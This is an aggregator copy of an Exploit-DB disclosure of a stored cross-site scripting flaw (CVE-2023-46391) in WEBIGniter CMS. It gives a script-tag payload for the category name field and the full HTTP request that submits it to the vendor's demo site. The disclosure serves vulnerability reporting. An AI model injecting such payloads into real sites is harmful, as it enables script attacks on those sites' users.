1
[webapps] WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51807
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)
# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Steps-To-Reproduce:
1. Login to the Account
2. Go to the Categories.
3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php
Request
POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK